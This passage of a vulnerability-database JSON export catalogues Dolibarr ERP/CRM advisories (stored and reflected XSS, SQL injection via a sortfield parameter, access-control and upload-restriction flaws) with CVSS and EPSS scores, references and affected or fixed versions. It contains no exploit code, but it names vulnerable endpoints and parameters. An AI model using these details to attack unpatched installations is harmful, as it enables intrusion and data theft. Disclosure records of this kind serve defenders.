ility":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2017-18259","GHSA-4323-cfj5-98mh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u1mx-ymsz-wqa2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/43567?format=json","vulnerability_id":"VCID-uc33-xses-ykft","summary":"Dolibarr Cross-site Scripting vulnerability\nIn `Dolibarr ERP CRM`, WYSIWYG Editor module, v2.8.1 to v13.0.2 are affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts in the `Private Note` field at `/adherents/note.php?id=1` endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. 
The injected scripts can extract the Session ID, which can lead to full Account takeover of the admin and due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"0.00415","scoring_system":"epss","scoring_elements":"0.61935","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_syste
m":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/370744?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnera
bility":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25955","GHSA-cpv8-6xgr-rmf6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uc33-xses-ykft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42696?format=json","vulnerability_id":"VCID-uzvh-dkqr-8ubf","summary":"Dolibarr Cross Site Scripting (XSS) vulnerability\nA Cross Site Scripting (XSS) vulnerability exists in Dolibarr before 14.0.3 via the ticket creation flow. 
Exploitation requires that an admin copies the payload into a box.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220","reference_id":"","reference_type":"","scores":[{"value":"0.00271","scoring_system":"epss","scoring_elements":"0.50706","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220"},{"reference_url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html"},{"reference_url":"https://truedigitalsecurity.com/advisory-summary-2021","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://truedigitalsecurity.com/advisory-summary-2021"},{"reference_url":"https://github.com/advisories/GHSA
-jqfp-m5f8-vg28","reference_id":"GHSA-jqfp-m5f8-vg28","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jqfp-m5f8-vg28"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76934?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.3"}],"aliases":["CVE-2021-42220","GHSA-jqfp-m5f8-vg28"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uzvh-dkqr-8ubf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38041?format=json","vulnerability_id":"VCID-v437-y5bb-nudu","summary":"Dolibarr Improper Input Validation 
vulnerability\nImproper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4198","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23546","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4198"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-
4198","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4198"},{"reference_url":"https://starlabs.sg/advisories/23/23-4198","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/"}],"url":"https://starlabs.sg/advisories/23/23-4198"},{"reference_url":"https://github.com/advisories/GHSA-48v2-596x-4jr9","reference_id":"GHSA-48v2-596x-4jr9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-48v2-596x-4jr9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67209?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0"}],"aliases":["CVE-2023-4198","GHSA-48v2-596x-4jr9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v437-y5bb-nudu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/60053?format=json","vulnerability_id":"VCID-vhht-9j9w-5bhr","summary":"Dolibarr SQL Injection vulnerability\nSQL Injection vulnerability in Dolibarr before version 7.0.2 allows remote attackers to execute arbitrary SQL commands via the sortfield parameter to /accountancy/admin/accountmodel.php, /accountancy/admin/categories_list.php, /accountancy/admin/journals_list.php, /admin/dict.php, /admin/mails_templates.php, or 
/admin/website.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-9019","reference_id":"","reference_type":"","scores":[{"value":"0.01997","scoring_system":"epss","scoring_elements":"0.83929","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-9019"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/83b762b681c6dfdceb809d26ce95f3667b614739","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/83b762b681c6dfdceb809d26ce95f3667b614739"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-9019","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-9019"},{"reference_url":"https://www.oracle.com/security-alerts/cpujan2021.html","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cv
ssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"reference_url":"https://github.com/advisories/GHSA-fff9-m6f6-q3mh","reference_id":"GHSA-fff9-m6f6-q3mh","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fff9-m6f6-q3mh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{
"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-9019","GHSA-fff9-m6f6-q3mh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vhht-9j9w-5bhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53984?format=json","vulnerability_id":"VCID-w7kv-4ajd-7ke6","summary":"Dolibarr CRM allows Privilege Escalation\nDolibarr CRM before 11.0.5 allows privilege escalation. 
This could allow remote authenticated attackers to upload arbitrary files via societe/document.php by editing the page's HTML source so that the upload control's \"disabled\" state is changed to \"enabled\" (the upload restriction was evidently enforced only in the browser and not re-checked by the server).
lynxgroup.com/security-research-advisories/vuln/WLX-2020-011"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/100581?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14201","GHSA-25h3-mw3p-w8r7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w7kv-4ajd-7ke6"},{"url":"http://public2.vulnerablecode.io/a
pi/vulnerabilities/60933?format=json","vulnerability_id":"VCID-w8pm-m6yc-5bfb","summary":"Dolibarr Cross-site scripting (XSS) vulnerability\nCross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10095","reference_id":"","reference_type":"","scores":[{"value":"0.475","scoring_system":"epss","scoring_elements":"0.9775","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10095"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10095","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:
R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10095"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vu